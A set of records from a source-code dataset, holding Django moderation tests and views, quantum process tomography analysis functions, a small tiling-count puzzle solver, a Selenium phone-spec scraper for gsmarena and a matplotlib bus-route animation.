self.client.get(url)\n #this works proven somewhere else\n outbound_message_to_pedro = OutboundMessage.objects.get(message=self.private_message)\n self.assertEquals(outbound_message_to_pedro.status, 'needmodera')\n\n def test_message_send_moderation_message(self):\n moderation, created = Moderation.objects.get_or_create(message=self.private_message)\n self.private_message.send_moderation_mail()\n\n self.assertEquals(len(mail.outbox),2)\n moderation_mail = mail.outbox[1]\n self.assertModerationMailSent(self.private_message, moderation_mail)\n \n def test_create_a_moderation(self):\n #I make sure that uuid.uuid1 is called and I get a sort of random key\n with patch('uuid.uuid1') as string:\n string.return_value.hex = 'oliwi'\n message = Message.objects.create(content = 
'Content 1', \n author_name='Felipe', \n author_email=\"falvarez@votainteligente.cl\", \n subject='Fiera es una perra feroz', \n public=False,\n writeitinstance= self.writeitinstance1, \n persons = [self.person1])\n\n self.assertFalse(message.moderation is None)\n self.assertEquals(message.moderation.key, 'oliwi')\n string.assert_called()\n #issue 114 found at https://github.com/ciudadanointeligente/write-it/issues/114\n def test_send_mails_only_once(self):\n with patch('nuntium.models.Message.send_moderation_mail') as send_moderation_mail:\n self.writeitinstance1.moderation_needed_in_all_messages = True\n self.writeitinstance1.save()\n\n send_moderation_mail.return_value = None\n message = Message.objects.create(content = 'Content 1', \n author_name='Felipe', \n author_email=\"falvarez@votainteligente.cl\", \n subject='Fiera es una perra feroz', \n public=False,\n writeitinstance= self.writeitinstance1, \n persons = [self.person1])\n\n message.recently_confirmated()\n\n\n number_of_moderations = Moderation.objects.filter(message=message).count()\n send_moderation_mail.assert_called_once_with()\n\n def test_message_has_a_method_for_moderate(self):\n self.confirmation.confirmated_at = datetime.datetime.now()\n self.confirmation.save()\n self.private_message.confirmated = True\n self.private_message.save()\n\n self.private_message.moderate()\n outbound_message_to_pedro = OutboundMessage.objects.get(message=self.private_message)\n\n self.assertTrue(self.private_message.moderated)\n self.assertEquals(outbound_message_to_pedro.status, 'ready')\n\n def test_message_that_has_not_been_confirmed_cannot_be_moderated(self):\n #this message has not been confirmed\n #and is private therefore requires moderation\n message = Message.objects.create(content = 'Content 1', \n author_name='Felipe', \n author_email=\"falvarez@votainteligente.cl\", \n subject='Fiera es una perra feroz', \n public=False,\n writeitinstance= self.writeitinstance1, \n persons = [self.person1])\n\n with self.assertRaises(ValidationError) as context:\n # this was taken from here\n # http://stackoverflow.com/questions/8215653/using-a-context-manager-with-python-assertraises#8215739\n try:\n message.moderate()\n except ValidationError as e:\n self.assertEqual(e.message,\n _('The message needs to be confirmated first',))\n raise \n\n self.assertFalse(message.moderated)\n outbound_message_to_pedro = OutboundMessage.objects.get(message=message)\n self.assertEquals(outbound_message_to_pedro.status, 'new')\n\n\n\n def test_there_is_a_moderation_url_that_sets_the_message_to_ready(self):\n self.confirmation.confirmated_at = datetime.datetime.now()\n self.confirmation.save()\n self.private_message.confirmated = True\n self.private_message.save()\n \n url = reverse('moderation_accept', kwargs={\n 'slug': self.private_message.moderation.key\n })\n response = self.client.get(url)\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'nuntium/moderation_accepted.html')\n\n #private_message = Message.objects.get(id=self.private_message.id)\n outbound_message_to_pedro = OutboundMessage.objects.get(message=self.private_message.id)\n self.assertEquals(outbound_message_to_pedro.status, 'ready')\n private_message = Message.objects.get(id=self.private_message.id)\n self.assertTrue(private_message.moderated)\n\n def test_moderation_get_success_url(self):\n expected_url = reverse('moderation_accept', kwargs={\n 'slug': self.private_message.moderation.key\n })\n 
self.assertEquals(self.private_message.moderation.get_success_url(), expected_url)\n\n    def test_moderation_get_reject_url(self):\n        expected_url = reverse('moderation_rejected', kwargs={\n            'slug': self.private_message.moderation.key\n            })\n        self.assertEquals(self.private_message.moderation.get_reject_url(), expected_url)\n\n    def test_there_is_a_reject_moderation_url_that_deletes_the_message(self):\n        '''\n        This is the case when you, the proud owner of a writeitInstance, \n        think that the private message should not go anywhere\n        and it should be deleted\n        '''\n        url = reverse('moderation_rejected', kwargs={\n            'slug': self.private_message.moderation.key\n            })\n        response = self.client.get(url)\n        self.assertEquals(response.status_code, 200)\n        self.assertTemplateUsed(response, 'nuntium/moderation_rejected.html')\n        #If someone knows how to do the DoesNotExist or where to extend from \n        #I could do a self.assertRaises but I'm not taking any more time in this\n        self.assertEquals(Message.objects.filter(id=self.private_message.id).count(), 0)\n\n\n    def test_when_moderation_needed_a_mail_for_its_owner_is_sent(self):\n        self.private_message.recently_confirmated()\n        #There should be two emails \n        #One is created for confirmation\n        #The other one is created for the moderation thing\n        self.assertEquals(len(mail.outbox),2)\n        moderation_mail = mail.outbox[1]\n        #it is sent to the owner of the instance\n        self.assertEquals(moderation_mail.to[0], self.private_message.writeitinstance.owner.email)\n        self.assertTrue(self.private_message.content in moderation_mail.body)\n        self.assertTrue(self.private_message.subject in moderation_mail.body)\n        self.assertTrue(self.private_message.author_name in moderation_mail.body)\n        self.assertTrue(self.private_message.author_email in moderation_mail.body)\n        current_site = Site.objects.get_current()\n        current_domain = 'http://'+current_site.domain\n        url_rejected = reverse('moderation_rejected', kwargs={\n            'slug': self.private_message.moderation.key\n            })\n\n        url_accept = reverse('moderation_accept', kwargs={\n            'slug': self.private_message.moderation.key\n            })\n\n\n        self.assertFalse(current_domain+url_rejected in moderation_mail.body)\n        self.assertTrue(url_rejected in moderation_mail.body)\n        self.assertFalse(current_domain+url_accept in moderation_mail.body)\n        self.assertTrue(url_accept in moderation_mail.body)\n\n\n\n    def test_creates_automatically_a_moderation_when_a_private_message_is_created(self):\n        message = Message.objects.create(content = 'Content 1', \n            author_name='Felipe', \n            author_email=\"falvarez@votainteligente.cl\", \n            subject='Fiera es una perra feroz', \n            public=False,\n            writeitinstance= self.writeitinstance1, \n            persons = [self.person1])\n\n        self.assertFalse(message.moderation is None)\n\n\n    def test_a_moderation_does_not_change_its_key_on_save(self):\n        '''\n        I found that every time I re-saved a moderation\n        its key was regenerated\n        '''\n        previous_key = self.private_message.moderation.key\n        self.private_message.moderation.save()\n        moderation = Moderation.objects.get(message=self.private_message)\n        post_key = moderation.key\n\n        self.assertEquals(previous_key, post_key)\n\n    def test_moderates_method(self):\n        moderation = Moderation.objects.get(message=self.private_message)\n        moderation.success()\n\n        message = Message.objects.get(moderation=moderation)\n        self.assertTrue(message.moderated)\n\n\n    #this test is for the issue https://github.com/ciudadanointeligente/write-it/issues/186\n    #\n    def 
test_confirmated_but_not_moderated_message_in_a_moderable_instance_is_in_needs_moderation_status(self):\n mail_count = len(mail.outbox)\n self.writeitinstance1.moderation_needed_in_all_messages = True\n self.writeitinstance1.save()\n\n data = {\n 'author_email':u'falvarez@votainteligente.cl',\n 'author_name':u'feli',\n 'public':True,\n 'subject':u'Fiera no está',\n 'content':u'¿Dónde está Fiera Feroz? en la playa?',\n 'persons': [self.person1.id]\n }\n url = self.writeitinstance1.get_absolute_url()\n response = self.client.post(url, data, follow=True, HTTP_HOST=self.host)\n message = Message.objects.get(\n author_name=\"feli\", \n author_email=\"falvarez@votainteligente.cl\",\n subject=\"Fiera no está\", \n content='¿Dónde está Fiera Feroz? en la playa?')\n confirmation = Confirmation.objects.get(message=message)\n\n confirmation_response = self.client.get(confirmation.get_absolute_url())\n\n #one message to Pedro\n outbound_message = OutboundMessage.objects.get(message=message)\n #Here I have the bug!!!!!\n self.assertEquals(outbound_message.status, 'needmodera')\n #This one is the bug!!\\\n\n","sub_path":"nuntium/tests/moderation_messages_test.py","file_name":"moderation_messages_test.py","file_ext":"py","file_size_in_byte":12759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"401246824","text":"from django.contrib.auth import (login as auth_login, logout as auth_logout,\n authenticate)\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.shortcuts import render_to_response, get_object_or_404, redirect\nfrom django.template import RequestContext\nfrom template2pdf.dj import direct_to_pdf\nfrom main.models import Professor\nfrom main.tables import ProfessorTable\n\ndef login(request):\n if request.user.is_authenticated():\n return redirect('home')\n\n form = AuthenticationForm()\n if request.method == 'POST':\n form = AuthenticationForm(None, request.POST)\n if form.is_valid():\n auth_login(request, form.get_user())\n return redirect('home')\n\n return render_to_response('login.html', RequestContext(request, {\n 'form': form,\n }))\n\n@login_required\ndef logout(request):\n auth_logout(request)\n return redirect('login')\n\n@login_required\ndef home(request):\n return render_to_response('main/base.html', RequestContext(request))\n\n@login_required\ndef professors(request):\n queryset = Professor.objects.all()\n table = ProfessorTable(queryset)\n return render_to_response('main/professor.html', {\n 'table': table,\n }, RequestContext(request))\n\n@login_required\ndef students(request):\n raise NotImplementedError\n\n@login_required\ndef groups(request):\n raise NotImplementedError\n\n@login_required\ndef grades(request):\n raise NotImplementedError\n\n@login_required\ndef reports(request):\n return direct_to_pdf(request, 'main/reports/test.rml')\n","sub_path":"sei/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"97278415","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 14 15:22:48 2018\n\n@author: Jarnd\n\"\"\"\nimport qiskit.tools.qcvv.tomography as tomo\nimport Analysis.tomography_functions as tomoself\nimport numpy as np\n\n#%% Fitting of tomodata to chi\ndef fit_tomodata_multiple(meas_data_all, tomo_set, B_chi, B_choi, n,stddv=True):\n '''\n Fit the measurement tomography data from multiple datasets in 
meas_data_all specified by tomo_set to a chi and a corresponding choi matrix.\n    There are 3 different methods:\n    -'own' (standard): This method uses the _fit_tomodata_own_() function, which is specified in that docstring.\n                It provides a CP and TP chi and choi matrix.\n                Furthermore, it calculates the standard deviation on chi (and choi) if stddv==True (standard).\n                For details, see the docstring of that function.\n    \n    The other two methods use the internal qiskit function qiskit.tools.qcvv.tomography.fit_tomography_data()\n    Both these methods use the wrapper function _fit_tomodata_qiskit_(). For details, see that docstring.\n    -'wizard' : This method gives a CP choi and chi matrix but has problems with trace preservation.\n    -'leastsq': This method is a straightforward least squares fit that does not promise CP, but has less problems with TP.\n    \n    The process matrices are returned as:\n        ((chi,chi_stddv),(choi,choi_stddv))\n    '''\n    B_chi = tomoself.get_pauli_basis(n, normalise=False)                        # Get the basis in which chi is expressed\n    B_prep = tomoself.get_pauli_basis(n, normalise=False)                       # Get the basis in which the experiments are prepared\n    B_meas = tomoself.get_pauli_basis(n, normalise=False)                       # Get the basis in which the measurements are done\n    \n    lam, lampau, lamstddv = tomoself.get_lambda_from_meas_multiple(tomo_set,    # Get the vectors lambda and lambda_stddv from the tomography data\n                                                          meas_data_all, n)\n    A = tomoself.get_A_mat(B_prep, B_meas, B_chi)                               # Calculate the A matrix from the prep, meas and chi basis\n    chivect = np.linalg.solve(A, lam)                                           # Invert to calculate chi in vectorform\n    Ainv = np.linalg.inv(A)                                                     # Calculate the inverse of A for error calculations (A is full rank)\n    Ainvsq = np.abs(Ainv)*np.abs(Ainv);                                         # Calculate the elementwise square of Ainv\n    lamstddvsq = lamstddv*lamstddv;                                             # Calculate the elementwise square of l_stddv\n    chistddvvect = np.sqrt(Ainvsq @ lamstddvsq)                                 # Calculate the standard deviation on chi using the method from the description\n    chi = np.reshape(chivect, ((2*n)**2, (2*n)**2))                             # Reshape into a square matrix\n    print('Minimum eigenvalue before: ', np.min(np.linalg.eigvals(chi)))\n    chi_stddv = np.reshape(chistddvvect, ((2*n)**2, (2*n)**2))                  # Reshape into a square matrix\n    print('largest eigenvalue before: ',np.max(np.linalg.eigvals(chi)))\n    num = np.max(np.linalg.eigvals(chi)) + np.abs(np.min(np.linalg.eigvals(chi)))\n    den = 1+16*np.abs(np.min(np.linalg.eigvals(chi)))\n    print('test: ',num/den,'times 4:',4*num/den)\n    #chi = make_CP(chi,n)\n    print('Minimum eigenvalue after: ', np.min(np.linalg.eigvals(chi)))\n    print('largest eigenvalue after: ',np.max(np.linalg.eigvals(chi)))\n    choi = tomoself.chi_to_choi(chi,B_choi, n)\n    choi_stddv = tomoself.chi_to_choi(chi_stddv, B_choi, n)\n    return ((chi,chi_stddv),(choi,choi_stddv))\n
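\n# A hypothetical usage sketch (not part of the original module): meas_data_all and\n# tomo_set would come from qiskit.tools.qcvv.tomography runs, the bases from tomoself:\n# (chi, chi_sd), (choi, choi_sd) = fit_tomodata_multiple(meas_data_all, tomo_set, B_chi, B_choi, n=1)\n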
It provides a CP and TP chi and choi matrix.\n Furthermore, it calculates the standard deviation on chi (and choi) if stddv==True (standard)\n For details, see the docstring of that function.\n \n The other two methods use the interal qiskit function qiskit.tools.qcvv.tomography.fit_tomography_data()\n Both these methods use the wrapper function _fit_tomodata_qiskit_(). For details, see that docstring.\n -'wizard' : This method gives a CP choi and chi matrix but has problems with trace preservation.\n -'leastsq': This method is a straightforward least squares fit that does not promise CP, but has less problems with TP.\n \n The process matrices are returned as:\n ((chi,chi_stddv),(choi,choi_stddv))\n '''\n if method == 'own':\n chi, chi_stddv = _fit_tomodata_own_(tomo_data, tomo_set, n, stddv)\n chi = make_CP(chi,n)\n choi = tomoself.chi_to_choi(chi,B_choi, n)\n choi_stddv = tomoself.chi_to_choi(chi_stddv, B_choi, n)\n elif method == 'wizard':\n choi = _fit_tomodata_qiskit_(tomo_data, method='wizard')\n chi = tomoself.choi_to_chi(choi, B_choi, n)\n chi_stddv = np.zeros_like(chi)\n choi_stddv = np.zeros_like(chi)\n print('Warning: no standard deviation calculated!')\n elif method == 'leastsq':\n choi = _fit_tomodata_qiskit_(tomo_data, method='leastsq')\n choi = make_CP(choi,n)\n chi = tomoself.choi_to_chi(choi, B_choi, n)\n chi_stddv = np.zeros_like(chi)\n choi_stddv = np.zeros_like(chi)\n print('Warning: no standard deviation calculated!')\n else:\n print('Wrong method supplied: %s is not a valid option.' %(method))\n return None\n return ((chi,chi_stddv),(choi,choi_stddv))\n\ndef _fit_tomodata_qiskit_(tomo_data, method=None):\n '''\n Use the qiskit functions to fit the tomography data. There are two methods:\n 'magic' (standard): This fits the tomography data to a choi matrix that is completely positive and has trace 1.\n For more info of the fitting method, see the documentation of qiskit.tools.qcvv.tomography.fit_tomography_data\n There might be problems with the trace preservation-qualities of the matrix when using this method.\n \n 'leastsq' : This fits the data to a Choi matrix via simple linear inversion.\n There is no guarantee on CP (so in almost all cases the Choi matrix will not be CP)\n Therefore different methods have to be used to make the process CP\n Returned is a choi matrix corresponding to the data.\n '''\n if method == None:\n choi_fit = tomo.fit_tomography_data(tomo_data, options={'trace': 1})\n else:\n choi_fit = tomo.fit_tomography_data(\n tomo_data, method, options={'trace': 1})\n return choi_fit\n\n\ndef _fit_tomodata_own_(tomo_data, tomo_set, n, stddv = True):\n '''\n Use own functions to fit the tomography data to a chi matrix.\n For an input pauli P_i and an measurement basis P_j, the function first\n - First rewrites the results in tomo_data into a vector lambda.\n The vector lambda is of the form l(ij) = tr[P_jL(P_i)],\n where L(|p><|p|.\n As such, L(P_i)] is the (weighted) sum of the positive and negative eigenspace states of P_i:\n See get_lambda_from_meas() for more details\n - Then the matrix A is calculated:\n A(ij,mn) = tr(P_j P_m P_i P_n). 
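\n# Sketch of how the two qiskit-backed options above are invoked elsewhere in this module\n# (hypothetical tomo_data; 'wizard' is CP by construction, 'leastsq' may need make_CP() below):\n# choi_w = _fit_tomodata_qiskit_(tomo_data, method='wizard')\n# choi_l = _fit_tomodata_qiskit_(tomo_data, method='leastsq')\n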
\n\ndef _fit_tomodata_own_(tomo_data, tomo_set, n, stddv = True):\n    '''\n    Use own functions to fit the tomography data to a chi matrix.\n    For an input Pauli P_i and a measurement basis P_j, the function:\n    - First rewrites the results in tomo_data into a vector lambda.\n        The vector lambda is of the form l(ij) = tr[P_j L(P_i)],\n        where L(|p><p|) denotes the channel acting on the prepared state |p><p|.\n        As such, L(P_i) is the (weighted) sum of the positive and negative eigenspace states of P_i:\n        See get_lambda_from_meas() for more details\n    - Then the matrix A is calculated:\n        A(ij,mn) = tr(P_j P_m P_i P_n). See get_A_mat() for more details.\n        A is full rank so invertible.\n    - The matrix A links chi with lambda:\n        l(ij) = sum(m,n) chi(m,n) tr(P_j P_m P_i P_n);\n        a vectorized lambda and chi give: l = A*chi.\n        Via linear inversion using the numpy.linalg.solve method chi is obtained.\n        The indices of A are like:\n        row ij = j + (i*j_total)\n        column mn = n + (m*n_total)\n    Furthermore, from the standard deviation as provided by get_lambda_from_meas(),\n    the standard deviation on chi is calculated. For a single element of chi:\n        stddv_chi(mn) = (sum(ij) ((Ainv)^2)(l_stddv)^2)^(1/2)\n    This is calculated by first taking the elementwise square of Ainv and l_stddv,\n    and then taking the matrix product of Ainv^2 and l_stddv^2.\n    The function then returns a tuple (chi, chi_stddv) both shaped into a square matrix\n    '''\n    B_chi = tomoself.get_pauli_basis(n)                         # Get the basis in which chi is expressed\n    B_prep = tomoself.get_pauli_basis(n, normalise=False)       # Get the basis in which the experiments are prepared\n    B_meas = tomoself.get_pauli_basis(n, normalise=False)       # Get the basis in which the measurements are done\n    lam, lampau, lamstddv = tomoself.get_lambda_from_meas(tomo_set,     # Get the vectors lambda and lambda_stddv from the tomography data\n                                                          tomo_data['data'], n)\n    A = tomoself.get_A_mat(B_prep, B_meas, B_chi)               # Calculate the A matrix from the prep, meas and chi basis\n    chivect = np.linalg.solve(A, lam)                           # Invert to calculate chi in vectorform\n    Ainv = np.linalg.inv(A)                                     # Calculate the inverse of A for error calculations (A is full rank)\n    Ainvsq = np.abs(Ainv)*np.abs(Ainv);                         # Calculate the elementwise square of Ainv\n    lamstddvsq = lamstddv*lamstddv;                             # Calculate the elementwise square of l_stddv\n    chistddvvect = np.sqrt(Ainvsq @ lamstddvsq)                 # Calculate the standard deviation on chi using the method from the description\n    chi = np.reshape(chivect, ((2*n)**2, (2*n)**2))             # Reshape into a square matrix\n    chistddv = np.reshape(chistddvvect, ((2*n)**2, (2*n)**2))   # Reshape into a square matrix\n    return chi,chistddv \n
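\n# A hand-checkable instance of A(ij,mn) = tr(P_j P_m P_i P_n) from the docstring above\n# (sketch with unnormalised one-qubit Paulis; not part of the original module):\n# import numpy as np\n# I2 = np.eye(2); X = np.array([[0, 1], [1, 0]])\n# np.trace(X @ X @ I2 @ I2)   # entry for i=I, j=X, m=X, n=I -> 2.0\n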
\n\n\n#%% Trace preservation functions\ndef _get_total_prob_(tomo_data):\n    '''\n    Get the total counts of all individual measurements, and divide them by the total number of shots for every experiment.\n    This should give a vector of only ones. If that is the case, then Trace Preservation is guaranteed after linear inversion.\n    If this is not the case, then there are measurements unaccounted for (e.g. a state was prepared but nothing was measured).\n    Then, TP is not guaranteed.\n    This function is mainly meant as a back-up test if the check_TP() function returns False.\n    It works on the measurement data itself,\n    but gives no assertion on the TP-qualities of a chi matrix computed from that data,\n    if the method used to calculate the chi matrix is not specified.\n    For the method _fit_tomodata_own_() TP should be preserved. For fit_tomodata() this is not always the case, see docstring for further details.\n    '''\n    meas_data = tomo_data['data']                               # Get the actual data\n    assert type(meas_data) == list\n    counts = []\n    for meas in meas_data:                                      # For all experiments (elements in meas_data)\n        countsvalues = meas['counts'].values()                  # Get the counts from the dictionary\n        counts.append(sum(list(countsvalues))/meas['shots'])    # Sum all the counts and divide by #shots; should be 1\n    return counts\n\ndef _get_TPsum_(chi, B_chi):\n    '''\n    Calculates sum(m,n) chi(m,n) B_n^(dagger)@B_m, which should be I for TP processes.\n    '''\n    d2 = np.shape(chi)[0]                                       # d^2, the number of elements in the basis {B}\n    iden = np.zeros_like(B_chi[0], dtype='complex')             # A dxd empty matrix to put all elements of the sum in\n    for m in range(d2):\n        for n in range(d2):\n            iden += chi[m, n]*np.mat(B_chi[n]).H@np.mat(B_chi[m])   # The np.mat class has a .H method that gives the hermitian\n    return iden\n\n\ndef check_TP(chi, B_chi, n):\n    '''\n    Returns True when sum(m,n) chi(m,n) B_n^{dagger} B_m is close to the identity channel using the np.allclose() method, returns False if not.\n    '''\n    assert np.shape(chi) == ((2**n)**2, (2**n)**2)\n    iden = np.eye(2**n, dtype='complex')                        # Identity matrix to which TPsum should be equal\n    TPsum = _get_TPsum_(chi, B_chi)                             # The sum of chi(m,n)*B_n^(dagger)*B_m for all n and m\n    return np.allclose(TPsum,iden)                              # Return True iff close\n\n#%% Complete positivity functions\ndef make_CP(chi, n):\n    '''\n    This function makes a TP process matrix chi completely positive while keeping it trace preserving.\n    The function works as follows:\n    - The eigenvalues of chi are calculated using the np.linalg.eigvals() method.\n    - The dimension of the matrix space d(=2**n) is calculated as the trace of chi\n    - If the eigenvalues are all nonnegative, then chi is already CP\n    - If not, the function then, for the minimum eigenvalue l_m\n        Calculates chi' = chi+abs(l_m)*I. Then chi' has no negative eigenvalues:\n        chi = PDPinv with D the diagonal matrix of the eigenvalues, P (&Pinv) the transformation matrix to the eigenbasis of chi; PPinv = I\n        Then: chi' = PDPinv + abs(l_m)*I = PDPinv + abs(l_m)*IPPinv = PDPinv + P*(abs(l_m)*I)*Pinv = P*(D+abs(l_m)I)*Pinv.\n        Thus, chi' now has only nonnegative eigenvalues.\n        However, the TP condition for chi reads: sum(m,n) chi(m,n) B_n@B_m = I\n        We now have: sum(m,n) chi'(m,n) B_n@B_m = sum(m,n) chi(m,n) B_n@B_m + sum(n) abs(l_m) B_n@B_n = I + d^2*abs(l_m)*I = (1+d^2*abs(l_m))*I\n        With d^2 the number of elements in the basis {B_n}\n        The trace of chi' is d*(1+d^2*abs(l_m)), so to obtain a TP version of chi' the function divides chi' by tr(chi')/d\n    The function now returns the CP and TP matrix chi'\n    '''\n    assert np.shape(chi) == ((2**n)**2, (2**n)**2)              # Check the dimensions\n    mineig = np.min(np.linalg.eigvals(chi))                     # Calculate the minimum eigenvalue of chi\n    trace_chi = np.trace(chi)                                   # Calculate d\n    if mineig < 0:\n        chiCP = np.add(chi, (-1)*mineig*np.eye((2*n)**2))       # Calculate chi'\n        return trace_chi*chiCP/np.trace(chiCP)                  # Multiply by d/tr(chi'), which is division by tr(chi')/d\n    return chi                                                  # chi is already CP; return it unchanged\n\ndef check_CP(chi):\n    '''\n    This function checks whether the matrix chi is a CP-process by checking the eigenvalues for negative numbers.\n    This works also for Choi matrices.\n    '''\n    eig = np.linalg.eigvals(chi)\n    if np.around(min(eig),10) >= 0:\n        return True\n    else: return False\n
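\n# Quick numeric sanity check for make_CP's eigenvalue shift (sketch, not in the original):\n# chi_bad = np.diag([2.5, 1.0, 0.5, -0.5]).astype(complex)  # one negative eigenvalue, n=1\n# chi_ok = make_CP(chi_bad, 1)\n# assert check_CP(chi_ok) and np.isclose(np.trace(chi_ok), np.trace(chi_bad))\n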
#%% Errors and fidelities\ndef get_chi_error(chi, chi_bas, U, mode='p'):\n    '''\n    Calculate the error matrix chi_error associated with the process matrix chi. chi_error is the chi matrix in a different basis {B_m@U}:\n        rho_out = sum(m,n) chi_error(m,n) (B_m@U) @ rho_in @ (U^dagger@B_n^dagger)\n    Using this relation, chi_error can be calculated from chi straight away:\n        chi_error = V@chi@V^(dagger), with V(m,n) = tr(B_m^(dagger)@B_(n)@U^(dagger))/d\n    \n    The error process can also be modeled to take place before the unitary operation:\n        rho_out = sum(m,n) chi_error(m,n) (U@B_m) @ rho_in @ (B_n^dagger@ U^dagger)\n    Then:\n        chi_error = V@chi@V^(dagger), with V(m,n) = tr(B_m^(dagger)@U^(dagger)@B_(n))/d\n    \n    Which order is used is specified by 'mode': \n        'p' (standard)  : first the unitary operation, then the error channel\n        'm'             : first the error channel, then the unitary operation\n    \n    For more information on chi_error, see 'Error matrices in quantum process tomography' by A. Korotkov.\n    '''\n    chi = np.mat(chi)\n    U = np.mat(U)\n    d = np.trace(chi_bas[0].conj().T*chi_bas[0])\n    V = np.mat(np.zeros((len(chi_bas), len(chi_bas))), dtype='complex')\n    mc = 0\n    for i in range(len(chi_bas)):\n        chi_bas[i] = np.mat(chi_bas[i])\n    for m in chi_bas:\n        nc = 0\n        for n in chi_bas:\n            if mode == 'p':\n                V[mc, nc] = np.trace(m.H @ n @ U.H)/d\n            if mode == 'm':\n                V[mc, nc] = np.trace(m.H @ U.H @ n)/d\n            nc += 1\n        mc += 1\n    return V @ chi @ V.H\n\ndef process_fidelity(chi_error, n):\n    '''\n    Returns the process fidelity tr(chi@chi_des) for an observed chi and a desired chi_des.\n    Since this is equal to tr(chi_I@chi_error) with chi_I the perfect chi for the identity channel,\n    the process fidelity is calculated as the topleft element of the error matrix chi_error.\n    '''\n    return chi_error[0,0]/np.trace(chi_error)                   # Divide by the total trace of chi to get a number between 0 and 1\n\ndef channel_fidelity(chi_error,B_choi, n):\n    '''\n    Returns the channel fidelity as >< n:\n        print(i-1)\n        exit()\n\n#4\nh, w, a, b = map(int, input().split())\nans = 0\n\ndef dfs(i, bit, a, b):\n    if i == h*w:\n        global ans\n        ans += 1\n        return\n    if bit >> i & 1:\n        dfs(i+1, bit, a, b)\n        return\n    if b:\n        dfs(i+1, bit | 1 << i, a, b-1)\n    if a:\n        if i % w != w-1 and not bit & 1 << (i+1):\n            dfs(i+1, bit | 1 << i | 1 << (i+1), a-1, b)\n        if i + w < h*w:\n            dfs(i+1, bit | 1 << i | 1 << (i+w), a-1, b)\ndfs(0, 0, a, b)\nprint(ans)\n","sub_path":"Day12.py","file_name":"Day12.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"35769609","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport json\nimport time\n\n\noptions = Options()\n# options.binary_location = \"C:\\\\path\\\\to\\\\chrome.exe\" #chrome binary location specified here\noptions.add_argument(\"--start-maximized\") #open Browser in maximized mode\noptions.add_argument(\"--no-sandbox\") #bypass OS security model\noptions.add_argument(\"--disable-dev-shm-usage\") #overcome limited resource problems\noptions.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\noptions.add_experimental_option('useAutomationExtension', False)\ndriver = webdriver.Chrome(options=options, executable_path=r'./chromedriver')\n\ndriver.get('https://www.gsmarena.com/makers.php3')\n\n\ncategory = []\nphones = []\nfilename = 'data.json'\n\n\ndef get_phones():\n    phones_url = \"return (function(){let cate = [] ; document.querySelectorAll('.makers a').forEach(function(i,e){cate.push('https://www.gsmarena.com/'+i.getAttribute('href'));}); return cate;})();\"\n    phones_url = driver.execute_script(phones_url)\n\n    for phone 
in phones_url:\n        phones.append(phone)\n\n    print(phones,len(phones))\n    while True:\n        if driver.execute_script(\"return document.querySelector('.nav-pages strong').nextElementSibling\"):\n            driver.execute_script(\"return document.querySelector('.nav-pages strong').nextElementSibling.click()\")\n            get_phones()\n        else:\n            print('all phones done')\n            break\n\n\ndef open_single_phone_page():\n\n    while True:\n        if len(phones) > 0:\n            print(len(phones),'Opening')\n            driver.get(phones.pop(0))\n            get_info_pic_and_save_in_file()\n            pass\n        else:\n            break\n\ndef get_info_pic_and_save_in_file():\n    time.sleep(2)\n    print('installing jquery')\n    with open('jquery.js', errors='ignore') as f:\n        driver.execute_script(f.read())\n    print('installed jquery')\n    print('getting information')\n    with open('get_information.js', errors='ignore') as f:\n        driver.execute_script(f.read())\n    print('got information')\n    time.sleep(3)\n    print('getting pictures')\n    if driver.execute_script(\" return document.querySelector('.article-info-meta-link a i.icon-pictures')\"):\n        driver.get('https://www.gsmarena.com/'+driver.execute_script(\" return document.querySelector('.article-info-meta-link a i.icon-pictures').parentElement.getAttribute('href');\"))\n        with open('pictures.js', errors='ignore') as f:\n            driver.execute_script(f.read())\n        print('got pictures')\n        time.sleep(1)\n\n    data = (driver.execute_script(\"return JSON.parse(localStorage.getItem('c'))\"))\n    \n    \n    with open(filename, 'a') as outfile:\n        json.dump(data, outfile)\n    with open(filename, 'a') as outfile:\n        outfile.write(',')\ndef main():\n    with open(filename, 'w') as outfile:\n        outfile.write('[')\n    # Get Main Brands From the First Page\n    category = \"return (function(){let cate = [] ; document.querySelectorAll('.st-text a').forEach(function(i,e){cate.push('https://www.gsmarena.com/'+i.getAttribute('href'));}); return cate;})();\"\n    category = driver.execute_script(category)\n\n    print(len(category))\n\n    i = 116\n\n    while i > 1:\n        category.pop()\n        i = i -1\n\n    print(len(category),category)\n\n    # If the brands array is not empty, pop a URL and \n    # 1. Get the pages until the pagination is empty\n    # 2. Open the Single Page Mobile\n    # 3. 
Get the information from the single page\n while True:\n \n if len(category) <= 0:\n print('end')\n break\n else:\n driver.get(category.pop(0))\n get_phones()\n open_single_phone_page()\n print('pop')\n\n\nmain()","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"318054855","text":"import matplotlib\nmatplotlib.use('TKAgg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\nfrom busstop.objects import Bus, BusStop, BusPassenger\nfrom busstop.linear import LinearBusRouteModel\n\ndef animate_model(model):\n fig = plt.figure()\n ax = fig.add_axes([0, 0, 1, 1])\n\n time = -1 # time\n events = model.init()\n for event in events:\n print((time,) + event)\n\n def init():\n # Initialise the graphics\n return model.init_animation(ax)\n\n def update(frame_number):\n # Update the simulation\n time = frame_number\n events = model.update()\n for event in events:\n print((time,) + event)\n # Update the graphics\n return model.update_animation()\n\n animation = FuncAnimation(fig, update, init_func=init, blit=True)\n plt.show()\n","sub_path":"busstop/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"234818683","text":"from sqlalchemy import create_engine, Column, Integer, String, Sequence, ForeignKey, Table, Text\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy.sql import 